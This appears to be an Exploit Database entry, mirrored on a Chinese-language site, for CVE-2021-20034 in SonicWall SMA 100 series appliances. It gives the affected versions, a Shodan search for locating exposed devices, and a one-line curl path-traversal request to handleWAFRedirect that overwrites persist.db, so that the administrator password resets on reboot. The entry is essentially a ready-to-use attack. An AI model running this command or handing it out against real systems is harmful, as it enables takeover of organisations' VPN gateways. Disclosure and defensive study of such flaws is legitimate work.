SonicWall SMA 10.2.1.0-17sv – Password Reset

• Exploit Database
• 18 阅读

• 作者： Jacob Baines
  日期： 2021-10-20
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50430/

• # Exploit Title: SonicWall SMA 10.2.1.0-17sv - Password Reset
  # Description: Overwrite the persistent database, resulting in password reset on reboot.
  # Shodan Dork: https://www.shodan.io/search?query=title%3A%22Virtual+Office%22+%22Server%3A+SonicWall%22
  # Date: 10/19/2021
  # Exploit Author: Jacob Baines (@Junior_Baines)
  # Root Cause Analysis: https://attackerkb.com/topics/23t9VCbGzt/cve-2021-20034/rapid7-analysis?referrer=profile
  # Vendor Homepage: https://www.sonicwall.com/
  # Version: SMA 100 Series using 9.0.0.10-28sv, 10.2.0.7-34sv, and 10.2.1.0-17sv
  # Tested on: SMA 500v using 9.0.0.10-28sv and 10.2.1.0-17sv
  # CVE : CVE-2021-20034
  
  curl -v --insecure "https://10.0.0.6/cgi-bin/handleWAFRedirect?hdl=../flash/etc/EasyAccess/var/conf/persist.db"